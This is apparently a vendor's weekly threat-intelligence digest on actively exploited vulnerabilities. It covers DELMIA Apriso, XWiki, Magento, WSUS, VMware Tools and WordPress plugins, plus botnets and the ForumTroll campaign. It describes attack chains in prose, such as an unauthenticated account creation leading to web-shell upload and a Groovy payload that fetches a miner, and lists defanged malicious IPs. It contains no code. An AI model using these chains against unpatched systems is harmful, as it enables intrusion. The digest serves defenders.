The cybersecurity landscape this week was marked by a sharp escalation in hands-on-exploitation, with threat actors actively targeting enterprise platforms, WordPress ecosystems, and vulnerable IoT infrastructure.  

CISA expanded its Known Exploited Vulnerabilities catalog by adding six high-priority flaws: two in Dassault Systèmes DELMIA Apriso and one each affecting Microsoft Windows, the XWiki Platform, Adobe Commerce and Magento, and Broadcom VMware. Meanwhile, four WordPress plugin vulnerabilities came under active attack, with Wordfence releasing detailed analysis to aid defenders.  

Botnet operators continued to scale operations globally, with EnemyBot, Sysrv-k, Andoryu, and Androxgh0st aggressively abusing exposed GitLab services, cloud gateways, and PHP-based applications. IoT botnets including Mirai, Bashlite, Tsunami, and BrickerBot intensified their focus on EirD1000 routers to establish persistent footholds and enable lateral movement across networks.

In parallel, targeted espionage activity resurfaced as Kaspersky uncovered Operation ForumTroll, a spear-phishing campaign weaponizing a Chrome sandbox-escape vulnerability to compromise selected victims. Simultaneously, Nviso Labs linked exploitation of a VMware tools vulnerability to suspected China-nexus actor UNC5174.  

Key points

• 6 new vulnerabilities were added to the CISA Known Exploited Vulnerabilities (KEV) catalog, reflecting recent exploitation activity.  
• 4 additional vulnerabilities were confirmed as actively exploited in the wild during the week.  
• Cytellite sensor telemetry detected exploit and botnet-driven scanning activity targeting globally exposed assets.  
• 2 vulnerabilities were identified as being exploited by active malware campaigns, indicating weaponization by threat actors.  
• Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.

Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.

CVE-2025-6204 - Code Injection Vulnerability in Dassault Systemes DELMIA Apriso
A Code Injection vulnerability in Dassault Systèmes DELMIA Apriso enables remote arbitrary code execution. According to Project Discovery, the issue is exploitable as part of a chained attack: CVE-2025-6205 permits unauthenticated creation of accounts with the privileged “Production User” role, and those credentials can then be used to abuse CVE-2025-6204, a file-upload path-traversal that allows writing executable files (for example, a web shell) into the web root, together enabling full system compromise. The flaw affects Release 2020 through Release 2025. Dassault released a patch in early August 2025, but a public proof-of-concept is available, and the vulnerability has now been added to CISA KEV catalog.

CVE-2025-6205 - Missing Authorization Vulnerability in Dassault Systemes DELMIA Apriso
A Missing Authorization vulnerability in Dassault Systèmes DELMIA Apriso that can lead to privilege escalation and remote code execution. Project Discovery showed a two-step chain: CVE-2025-6205, an unauthenticated SOAP account-creation flaw that can create privileged “Production User” accounts followed by CVE-2025-6204, a path-traversal file-upload that allows writing executable files (web shell) into the web root, enabling RCE. The issue affects Release 2020–2025; Dassault released a patch in early August 2025. A public proof-of-concept is available, and the vulnerability has been added to CISA KEV catalog.

CVE-2025-11533 – Privilege Escalation Vulnerability in WP Freeio WordPress plugin
A Privilege Escalation vulnerability in the WP Freeio WordPress plugin allows unauthenticated attackers to create administrator accounts by manipulating the user-role field during registration, due to an insecure process_register() function in the WP_Freeio_User class. The flaw affects versions prior to 1.2.22 and was patched in version 1.2.22. Wordfence reports that exploitation began immediately after public disclosure on October 10, 2025, with over 33,200 attacks blocked as threat actors used cloud-based infrastructure to automate attempts. Once admin access is obtained, attackers can upload malicious plugins or themes and alter site content for redirection or spam injection. A public proof-of-concept is available, and the vulnerability is actively being exploited in the wild.

CVE-2025-24893 - Eval  Injection Vulnerability in XWiki Platform
A Eval Injection vulnerability in XWiki platform allows unauthenticated attackers to inject templates and execute arbitrary Groovy code via the SolrSearch macro. OffSec identified that the Main.SolrSearchMacros macro unsafely evaluates Groovy expressions supplied through the search parameter on publicly exposed instances, enabling full RCE when the macro is present. Their analysis outlines a two-stage attack chain where a URL-encoded Groovy payload downloads a downloader (x640) into /tmp/11909 from 193.32.208(.)24:8080, which then fetches additional payloads (x521/x522) that deploy a UPX-packed Monero miner (tcrond), eliminate competing miners, persist under /var/tmp, and mine via auto.c3pool.org:80. The activity was linked to 123.25.249(.)88 and flagged in AbuseIPDB. Public proof-of-concepts are available and Vulncheck has confirmed active exploitation. The vulnerability is patched in XWiki versions 15.10.11, 16.4.1, and 16.5.0-RC1. This flaw has also been added to the CISA KEV catalog.  

CVE-2025-41244 - Privilege Defined with Unsafe Actions Vulnerability in the Broadcom VMware Aria Operations and VMware Tools
A Privilege Defined with Unsafe Actions Vulnerability in Broadcom VMware Aria Operations and VMware Tools allows a low-privilege user on a VM to escalate privileges to root by exploiting an untrusted search path in the get-versions.sh script used for service discovery. The flaw stems from overly broad binary-matching logic that executes a discovered binary with elevated rights, enabling an attacker to place a malicious executable in a writable directory and have it run with root privileges. Active exploitation has been observed since mid-October 2024, prompting Broadcom to release patched versions. Organizations are advised to update immediately and monitor for unusual child processes spawned by vmtoolsd or get-versions.sh and script artifacts in /tmp/VMware-SDMP-Scripts-UUID directories. This vulnerability has also been added to the CISA KEV catalog due to confirmed exploitation in the wild.

CVE-2025-54236 - Improper Input Validation Vulnerability in Adobe Commerce and Magento Open Source
An Improper Input Validation vulnerability in Adobe Commerce and Magento Open Source allows session takeover and remote code execution through a nested deserialization flaw in the Commerce REST API. Despite Adobe releasing a hotfix in September 2025, Sansec has recently detected active exploitation, recording more than 250 attack attempts within 24 hours, where threat actors uploaded PHP webshells via the /customer/address_file/upload endpoint and executed phpinfo probes to gather server configuration data. Current telemetry indicates that approximately 62% of Magento stores remain unpatched, leaving a substantial portion of the ecosystem exposed to compromise. The vulnerability has since been added to the CISA KEV catalog, underscoring the urgent need to apply Adobe’s latest security update or implement the recommended mitigations immediately.  

CVE-2025-59287 - Deserialization of Untrusted Data Vulnerability in Microsoft Windows
A Deserialization of Untrusted Data vulnerability in Microsoft Windows Server Update Services (WSUS) allows unauthenticated remote code execution via unsafe deserialization of encrypted AuthorizationCookie objects delivered to the GetCookie() SOAP endpoint. HawkTrace analysis shows AES-128-CBC-decrypted payloads are passed to BinaryFormatter.Deserialize() without type validation, enabling crafted serialized objects to execute code in the WSUS process (running as SYSTEM); Eye Security observed active exploitation beginning 06:55 UTC on 24 October 2025, and the Netherlands NCSC corroborated those incidents. Although Microsoft released a patch in the October 2025 update, a public proof-of-concept exploit is available, and real-world exploitation has been observed. The issue has now been added to the CISA KEV catalog, and affected organizations should apply the vendor update or implement recommended mitigations immediately.

Resurgent WordPress Exploit Campaign Targets GutenKit & Hunk Companion Vulnerabilities
Wordfence observed a renewed wave of mass exploitation targeting three critical WordPress plugin vulnerabilities: CVE-2024-9234 in GutenKit, CVE-2024-9707 and CVE-2024-11972 in Hunk Companion.  

These flaws allow unauthenticated attackers to install arbitrary plugins or upload malicious files, leading to full site compromise. CVE-2024-9234 affects GutenKit up to and including version 2.1.0 and was patched in version 2.1.1. CVE-2024-9707 involves a missing capability check in Hunk Companion’s import endpoint and CVE-2024-11972 stems from a broken permission callback that forces permissions to always pass; both issues were fixed in later Hunk Companion updates.  

Since the attack resurgence, Wordfence has blocked over 8.7 million exploit attempts as a botnet of compromised servers and cloud systems deploys malicious plugin ZIPs containing backdoors, file managers, and web shells. Fake plugin names observed in this campaign include background-image-cropper, ultra-seo-processor-wp, oke, and up, used to gain persistence, exfiltrate data, and launch follow-on payloads. Users are urged to immediately update the affected plugins and inspect sites for unauthorized plugin installations.

Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.

Multiple vulnerabilities were actively exploited by botnets, demonstrating automated infection and propagation across vulnerable systems. Analysis of MISP logs identified the top CVEs targeted by botnets, with payloads indicative of botnet activity, such as using wget commands with specific IP addresses, highlighting ongoing automated exploitation campaigns.

Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analyzed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.  

Operation ForumTroll leverages a Google Chrome vulnerability
Kaspersky researchers have recently identified that an spear-phishing campaign dubbed as Operation ForumTroll leveraged a Chrome sandbox escape vulnerability, CVE-2025-2783, as a zero-day, delivered via a forum-themed lure to achieve remote code execution, with the initial compromise chain bootstrapped by a lightweight loader known as LeetAgent that establishes C2 and stages follow-on payloads. Researchers further links the campaign to deployment of Dante spyware (a commercial, heavily obfuscated Memento Labs toolset featuring VMProtect, AES-encrypted modular components, machine-bound keys, and advanced anti-analysis measures), and shared code paths, persistence mechanisms, and artifacts strongly indicate reuse or supply of Dante components in these operations against media, academic, research, government, and financial targets.  

Chinese hackers exploit VMware Tools flaw
Nviso Labs reports that the active exploitation of CVE-2025-41244 appears tied to UNC5174, a suspected China-nexus threat group known for opportunistic use of publicly available exploits for initial access. However, analysts caution that because the exploit technique is straightforward and mirrors common malware behavior such as naming malicious binaries after legitimate system files like httpd it is still uncertain whether UNC5174 intentionally abused the vulnerability or if other threats have been unknowingly triggering this local privilege-escalation flaw over time.

PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.

Overall, this week underscored a clear trend of adversaries accelerating real-world exploitation across multiple attack surfaces, combining opportunistic mass-scanning with targeted intrusions and sophisticated privilege-escalation techniques Platforms like Loginsoft Vulnerability Intelligence (LOVI) help organizations stay ahead by delivering timely exploit insights, mapping attacker activity, and enabling rapid response to emerging threats in a constantly evolving threat landscape.

FAQs:

1) What is Microsoft Windows Server Update Service (WSUS)?

A) Windows Server Update Services (WSUS) is a Windows Server role used by organizations to centrally approve, manage, and distribute Microsoft updates to endpoints, allowing clients to pull update metadata and approved patches from an internal repository over HTTP (port 8530) or HTTPS (port 8531) instead of contacting Microsoft Update directly.  

2) What is CVE-2025-2783?

A) CVE-2025-2783 is a sandbox escape vulnerability in the Google Chromium Mojo on Windows that arises due to logic error, where an incorrect handle is assigned under certain unspecified conditions. The flaw, described as an instance of an "incorrect handle provided in unspecified circumstances," could allow attackers to escape Chrome’s security sandbox, potentially leading to remote code execution.

3) What does “PoC available” mean, and why does it increase risk for a vulnerability?

A) “PoC available” means a working exploit for the vulnerability has been publicly released, proving it can be abused. This helps defenders test and validate fixes, but it also gives attackers a ready-made blueprint, often leading to rapid and widespread exploitation if systems remain unpatched.  

4) What does inclusion in the CISA KEV catalog indicate about a vulnerability’s risk level?

A) When a vulnerability is added to the CISA KEV catalog, it signifies that it is being actively exploited in real-world attacks and poses a serious, immediate risk. CISA includes only confirmed exploited vulnerabilities in this list to ensure organizations focus on patching the most dangerous threats first. Being listed means the flaw demands urgent remediation to prevent compromise across government and enterprise environments.